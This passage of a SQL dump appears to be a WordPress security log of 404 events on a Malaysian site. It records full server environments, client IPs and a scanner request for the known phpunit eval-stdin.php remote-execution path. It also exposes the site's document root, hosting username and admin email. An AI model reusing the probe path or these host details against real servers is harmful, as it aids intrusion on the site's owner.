00:33:58',30809944,32621792,'https://bintara.com.my/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',1,0,'47.89.208.37'),(26868,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:84:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569236575.7268779277801513671875\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569236575.7268779277801513671875\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569236575.7268779277801513671875\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1569236575.7268779277801513671875\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"38854\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569236575.7268779277801513671875\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYimX7BAWOqnjv6og71fzAAAAQY\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYimX7BAWOqnjv6og71fzAAAAQY\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"38854\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYimX7BAWOqnjv6og71fzAAAAQY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569237484.8934\";s:12:\"REQUEST_TIME\";s:10:\"1569237484\";}}','notice','2019-09-23 11:18:25','2019-09-23 11:18:08',30792184,31044400,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1569236575.7268779277801513671875',1,0,'103.6.198.69'),(26869,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:45:\"/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:136:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 YaBrowser/18.3.1.1232 Yowser/2.5 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:43:\"page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"192.3.139.139\";s:11:\"REMOTE_PORT\";s:5:\"41865\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYjK7S-hSs4yT7zPcWfVyQAAAA0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569245933.1203\";s:12:\"REQUEST_TIME\";s:10:\"1569245933\";}}','notice','2019-09-23 13:38:54','2019-09-23 13:38:53',30813520,32622928,'https://bintara.com.my/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2',1,0,'192.3.139.139'),(26870,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:23:\"http://bintara.com.my/2\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/2\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYjXW2LkiuNLQQwjy5lUNAAAAM0\";s:12:\"REDIRECT_URL\";s:2:\"/2\";s:11:\"REMOTE_ADDR\";s:14:\"162.243.13.195\";s:11:\"REMOTE_PORT\";s:5:\"50886\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:10:\"SCRIPT_URL\";s:2:\"/2\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYjXW2LkiuNLQQwjy5lUNAAAAM0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569249115.5398\";s:12:\"REQUEST_TIME\";s:10:\"1569249115\";}}','notice','2019-09-23 14:31:58','2019-09-23 14:31:56',31229440,33031504,'https://bintara.com.my/2',1,0,'162.243.13.195'),(26871,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/3\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:23:\"http://bintara.com.my/3\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/3\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYjXY-LT3hjYYZpXT@nMPwAAAQE\";s:12:\"REDIRECT_URL\";s:2:\"/3\";s:11:\"REMOTE_ADDR\";s:14:\"162.243.13.195\";s:11:\"REMOTE_PORT\";s:5:\"53088\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:10:\"SCRIPT_URL\";s:2:\"/3\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYjXY-LT3hjYYZpXT@nMPwAAAQE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569249123.2118\";s:12:\"REQUEST_TIME\";s:10:\"1569249123\";}}','notice','2019-09-23 14:32:05','2019-09-23 14:32:03',30756080,32566384,'https://bintara.com.my/3',1,0,'162.243.13.195'),(26872,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:32:\"https://bintara.com.my/wp-admin/\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYjXkvLT3hjYYZpXT@nMWAAAAQY\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYjXkvLT3hjYYZpXT@nMWAAAAQY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"162.243.13.195\";s:11:\"REMOTE_PORT\";s:5:\"40168\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYjXkvLT3hjYYZpXT@nMWAAAAQY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569249170.5724\";s:12:\"REQUEST_TIME\";s:10:\"1569249170\";}}','notice','2019-09-23 14:32:52','2019-09-23 14:32:50',30748576,32556240,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'162.243.13.195'),(26873,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/2\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYjX5KQg-7C5XlRoF7K6wwAAAIY\";s:12:\"REDIRECT_URL\";s:2:\"/2\";s:11:\"REMOTE_ADDR\";s:14:\"162.243.13.195\";s:11:\"REMOTE_PORT\";s:5:\"39480\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:10:\"SCRIPT_URL\";s:2:\"/2\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYjX5KQg-7C5XlRoF7K6wwAAAIY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569249252.3561\";s:12:\"REQUEST_TIME\";s:10:\"1569249252\";}}','notice','2019-09-23 14:34:14','2019-09-23 14:34:12',30754968,32567984,'https://bintara.com.my/2',1,0,'162.243.13.195'),(26874,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/3\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/3\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYjX6fLT3hjYYZpXT@nMiwAAARE\";s:12:\"REDIRECT_URL\";s:2:\"/3\";s:11:\"REMOTE_ADDR\";s:14:\"162.243.13.195\";s:11:\"REMOTE_PORT\";s:5:\"41366\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:10:\"SCRIPT_URL\";s:2:\"/3\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYjX6fLT3hjYYZpXT@nMiwAAARE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1569249257.69\";s:12:\"REQUEST_TIME\";s:10:\"1569249257\";}}','notice','2019-09-23 14:34:19','2019-09-23 14:34:18',30754968,32567984,'https://bintara.com.my/3',1,0,'162.243.13.195'),(26875,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:32:\"https://bintara.com.my/wp-admin/\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYjYEqQg-7C5XlRoF7K61QAAAIE\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYjYEqQg-7C5XlRoF7K61QAAAIE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"162.243.13.195\";s:11:\"REMOTE_PORT\";s:5:\"55446\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_